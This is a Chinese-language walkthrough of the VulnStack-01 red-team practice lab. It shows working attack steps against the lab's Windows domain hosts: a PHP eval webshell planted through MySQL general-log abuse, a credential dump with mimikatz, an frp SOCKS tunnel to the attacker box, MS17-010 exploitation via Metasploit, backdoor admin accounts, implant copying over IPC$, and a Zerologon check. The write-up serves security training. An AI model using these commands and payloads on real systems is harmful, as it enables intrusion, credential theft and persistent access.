VulnStack-01 ATT&CK红队评估
靶场信息
地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
发布日期:2019年10月20日 14:05
目标:上线三个管理员权限靶机
标签: 内网渗透 | Kill Chain | 域渗透 | 威胁情报
百度网盘:https://pan.baidu.com/s/1nC6V8e_EuKfaLb2IuEbe7w&shfl=sharepset
密码: 下载密码:n1u2
环境配置
image-20210816150309869
1)设置网卡信息
文章中的网卡设置如下
这里共使用了2张网卡,VMnet1和VMnet2,其中VMnet1连接有kali和第一个靶场,说明此网卡用来模拟公网ip,我本地使用NAT的VMnet8来代替,VMnet2内网网卡使用本地的VMnet6代替
绘图3
查看第三个靶场的网卡配置
image-20210816224207514
查看第三个靶场的网卡配置,需要把我本地的VMnet6设置为
ip地址:192.168.52.1
子网掩码:255.255.255.0
默认网关:192.168.52.2
VMware虚拟网络配置
子网ip:192.168.52.0
子网掩码:255.255.255.0
DHCP
ip范围:192.168.52.3-254
image-20210816224611723
三个靶机网卡配置
第一个靶场windows7
双网卡:VMnet8(NAT)+VMnet6
这里需要注意,VMnet6的网卡所在的网络适配器IP是自定义的,NAT是自动获取,不能弄反
第二个靶场win2k3
网卡VMnet6
第三个靶场windows2008
网卡VMnet6
攻击机kali
网卡VMnet8(NAT)
2)win7靶机开启phpstudy
image-20210817155537114
3)windows2008开启redis服务
image-20210818231550535
一、信息收集
1)确定目标
使用netdiscover扫描10.0.1.0网段存活主机
netdiscover -r 10.0.1.0/24 -i eth0
得到ip地址:10.0.1.5
**
2)端口扫描
nmap -v -T4 -p- -A -oN nmap.log 10.0.1.5
phpstudy开的80和3306
image-20210816230424517
3)访问靶机
http://10.0.1.5
探针里面已经泄露了网站的绝对路径
image-20210816230623436
尝试一下,可以访问phpmyadmin,且mysql是弱口令root/root毫无套路
4)上线蚁剑
http://10.0.1.5/phpmyadmin
通过phpstudy开启的服务,使用弱口令连接phpmyadmin
image-20210816231520381
写入webshell
show global variables like '%secure_file_priv%';
NULL 不允许导入或导出
/tmp 只允许在 /tmp 目录导入导出
空 不限制目录
这里是NULL,放弃这个into outfile,尝试写日志或者利用yxcms,既然在mysql窝里那就搞mysql吧
image-20210816231919421
日志文件写 shell
SHOW VARIABLES LIKE 'general%';
image-20210816232940366
general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。可以尝试自定义日志文件,并向日志文件里面写入内容的话,那么就可以成功 getshell:
# 更改日志文件位置
set global general_log = "ON";
set global general_log_file='C:/phpStudy/WWW/ch4nge.php';
# 查看当前配置
SHOW VARIABLES LIKE 'general%';
成功
image-20210816233127924
# 往日志里面写入 payload
select '<?php @eval($_POST[miss]);?>';
# 此时已经写到 ch4nge.php 文件当中了
image-20210816233243292
蚁剑连接
连上了
image-20210816233333885
探测一下发现管理员权限还出网
image-20210816233649426
5)补充:yxcms上线蚁剑方法
想搞yxcms可以参考我前面的文章https://www.freebuf.com/articles/web/277572.html
管理员登录需要修改r=admin
yxcms的默认用户名密码是admin/123456
在页面配置中可以修改页面源码,直接加入一句话就ok了。
6)上线CS
kali的ip是10.0.1.12,启动CS服务,建立监听生成远控马,蚁剑传进去执行上线
image-20210816234136020
二、内网信息搜集
1)logonpasswords读取密码成功
hongrisec@2019
image-20210816234346492
2)系统信息
systeminfo
主机名: STU1
OS 名称: Microsoft Windows 7 专业版
OS 版本: 6.1.7601 Service Pack 1 Build 7601
系统类型: x64-based PC
域: god.org
登录服务器: \\OWA
修补程序: 安装了 4 个修补程序。
[01]: KB2534111
[02]: KB2999226
[03]: KB958488
[04]: KB976902
3)网卡信息
ipconfig /all
可以看出此靶机存在域中
域名:god.org
双网卡:
net1:10.0.1.5(模拟公网)
net2:192.168.52.143(可以看出这个是内网ip了)
DNS:192.168.52.138
这个DNS大概率是域控god.org的ip
image-20210816234602114image-20210816234631555
4)端口服务信息
扫描到的东西好多啊。发现网段内存活的另外两台机器分别是138和141。三台竟然都有ms17010,没啥遗憾的,之前没有找到143这个漏洞是因为这个机器防火墙开了,外面扫不到
shell C:\Windows\Temp\fscan.exe -h 192.168.52.1/24
scan start
(ICMP) Target '192.168.52.138' is alive
(ICMP) Target '192.168.52.141' is alive
(ICMP) Target '192.168.52.143' is alive
icmp alive hosts len is: 3
192.168.52.138:135 open
192.168.52.138:80 open
192.168.52.143:135 open
192.168.52.143:80 open
192.168.52.141:21 open
192.168.52.143:445 open
192.168.52.138:445 open
192.168.52.141:135 open
192.168.52.141:445 open
192.168.52.143 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
NetInfo:
[*]192.168.52.143
[->]stu1
[->]169.254.129.186
[->]192.168.52.143
[->]10.0.1.5
NetInfo:
[*]192.168.52.138
[->]owa
[->]192.168.52.138
192.168.52.141 MS17-010 (Windows Server 2003 3790)
NetInfo:
[*]192.168.52.141
[->]root-tvi862ubeh
[->]192.168.52.141
192.168.52.138 MS17-010 (Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
WebTitle:http://192.168.52.138:80 200 None
192.168.52.143:3306 open
192.168.52.141:7001 open
FTP:192.168.52.141:21:ftp admin123A
WebTitle:http://192.168.52.143:80 200 phpStudy 鎺㈤拡 2014
192.168.52.143 MS17-010 (Windows 7 Professional 7601 Service Pack 1)
NetInfo:
[*]192.168.52.143
[->]stu1
[->]169.254.129.186
[->]192.168.52.143
[->]10.0.1.5
WebTitle:http://192.168.52.138:80 200 None
NetInfo:
[*]192.168.52.138
[->]owa
[->]192.168.52.138
NetInfo:
[*]192.168.52.141
[->]root-tvi862ubeh
[->]192.168.52.141
192.168.52.141 MS17-010 (Windows Server 2003 3790)
192.168.52.138 MS17-010 (Windows Server 2008 R2 Datacenter 7601 Service Pack 1)
FTP:192.168.52.141:21:ftp admin123A
5)域内机器信息
使用CS的插件上传运行nbtscan进行扫描,或者自己上传nbtscan扫描
image-20210818215517732
192.168.52.138 GOD\OWA SHARING DC
192.168.52.141 GOD\ROOT-TVI862UBEH SHARING ?
192.168.52.143 GOD\STU1 SHARING
image-20210818215550571
三、frp打隧道
(1)配置文件
靶机:
# frpc.ini
[common]
server_addr = 10.0.1.12
server_port = 11608
[http_proxy]
type = tcp
remote_port = 11668
plugin = socks5
/PS:
# frps.ini[common]bind_addr = 0.0.0.0bind_port = 11608
先在/PS建立服务端
./frps -c frps.ini
image-20210817001401291
然后在靶机开启客户端
shell cd C:\Windows\Temp\ && frpc.exe -c frpc.ini
image-20210817002249004
kali回显
image-20210817002312187
proxychains设置:
10.0.1.12 11668
连接测试
经过测试,ftp连接登录后,无法获取目录
image-20210817004754233
四、攻击192.168.52.138
1)思路描述
(1)思考1
在攻击过程中我发现没有建立IPC的时候windows7系统的web服务器中可以直接dir列出192.168.52.138和192.168.52.141两台机器的目录,这也是靶机域环境的一个漏洞
image-20210818220737043image-20210818220704119
所以,我们可以对CS会话建立192.168.52.143(切记,不能写10.0.1.5)的中转监听,生成这个监听的木马,把马传到141和138的机器,然后使用永恒之蓝运行exe木马就可以上线
copy 64.exe \\192.168.52.141\c$\windows\system32\
copy 64.exe \\192.168.52.138\c$\windows\system32\
(2)思考2
既然存在永恒之蓝漏洞,可以使用永恒之蓝漏洞新建用户并添加到本地administrators组,这里不能建立域用户。提示:建立用户是很容易被发现的~
image-20210818223431301
net user ch4nge QWEasd123 /add
net localgroup Administrators ch4nge /add
难用的方法:使用CS的会话建立IPC
net use \\192.168.52.138\ipc$ "QWEasd123" /user:ch4nge
# 这里发现从域普通用户IPC连接域普通用户,需要域管理员的账号才行,所以想用这个方法渗透到这个普通域用户机器需要在域控那里直接IPC连接(域信任),或者就是好用的方法wmiexec
net use \\192.168.52.141\ipc$ "QWEasd123" /user:ch4nge
#然后copy马过去,永恒之蓝去执行.永恒之蓝执行命令
好用的方法:通过隧道使用wmiexec连接获取shell,windows版本的wmiexec好用
wmiexec.exe ch4nge:QWEasd123@192.168.52.141
put 32.exe
image-20210819004521782
注意192.168.52.141是win2003,是32位系统,木马要生成32位的
image-20210819004556704
(3)思考3
哈希置零攻击CVE-2020-1472
上传mimikatz,CS上检测是否存在CVE-2020-1472漏洞,看图显示Authentication: OK -- vulnerable表示存在,可以用这个方式攻击域控。
注意这里的sccount从nbtscan得到
shell mimikatz "lsadump::zerologon /target:192.168.52.138 /account:OWA$" "exit"
image-20210818222717067
141这个报错没见过,有师傅知道报错是什么原因导致的吗
image-20210818222940630
2)永恒之蓝+wmiexec上线CS
(1)建立中转监听
image-20210817005034203
(2)生成32位和64位的木马
64.exe和32.exe
image-20210819004815677image-20210819004824797
(3)msfconsole设置代理
setg Proxies socks5:10.0.1.12:11668
setg ReverseAllowProxy true
image-20210818220154657
(4)使用ms17-010模块进行攻击
msf6 > search ms17-010
msf6 > use 0
image-20210818220254292
msf6 auxiliary(admin/smb/ms17_010_command) > set RHOSTS 192.168.52.138
RHOSTS => 192.168.52.138
msf6 auxiliary(admin/smb/ms17_010_command) > set COMMAND ipconfig
COMMAND => ipconfig
msf6 auxiliary(admin/smb/ms17_010_command) > run
image-20210818220502516
创建管理员组用户
net user ch4nge QWEasd123 /add
net localgroup Administrators ch4nge /add
net user ch4nge
image-20210818233503646image-20210818233539854image-20210818233610709
(5)192.168.52.141建立管理员组用户
net user ch4nge QWEasd123 /add
net localgroup Administrators ch4nge /add
net user ch4nge
image-20210818234502256image-20210818234548125image-20210818234638222
(6)建立IPC
然后使用CS的会话建立IPC
net use \\192.168.52.138\ipc$ "QWEasd123" /user:ch4nge
net use \\192.168.52.141\ipc$ "QWEasd123" /user:ch4nge
删除IPC方法
net use \\192.168.52.141 /del /y
image-20210818234838829
192.168.52.141建立IPC成功,但是不能使用dir列C盘目录,使用域管理员用户才有权限,好家伙,先上线域控再说
copy马过去,永恒之蓝去执行.永恒之蓝执行命令的当前路径是C:\windows\system32\
直接copy到这个路径
copy 64.exe \\192.168.52.138\c$\windows\system32\
image-20210819001353398
执行木马,上线CS
msf6 auxiliary(admin/smb/ms17_010_command) > set rhosts 192.168.52.138
rhosts => 192.168.52.138
msf6 auxiliary(admin/smb/ms17_010_command) > set COMMAND 64.exe
COMMAND => 64.exe
msf6 auxiliary(admin/smb/ms17_010_command) > run
image-20210819001515464
(7)通过隧道使用wmiexec连接获取shell
windows版本的wmiexec好用
当然啦,域控也可以这样上线
wmiexec.exe ch4nge:QWEasd123@192.168.52.141
put 32.exe
image-20210819004521782
注意192.168.52.141是win2003,是32位系统,木马要生成32位的
image-20210819004556704image-20210819005346701
总结
在打此靶场遇到一些问题总结如下
1.靶机中的域信任关系,域控可以直接dir 该域普通用户
2.域普通用户A对域普通用户B进行IPC的时候,要用B的域管理员用户才可以,本地管理员用户不可以;wmiexec使用B的本地用户和域管理员用户都可以连接
3.用wmiexec连接已知密码的靶机
- 点赞
- 收藏
- 关注作者
评论(0)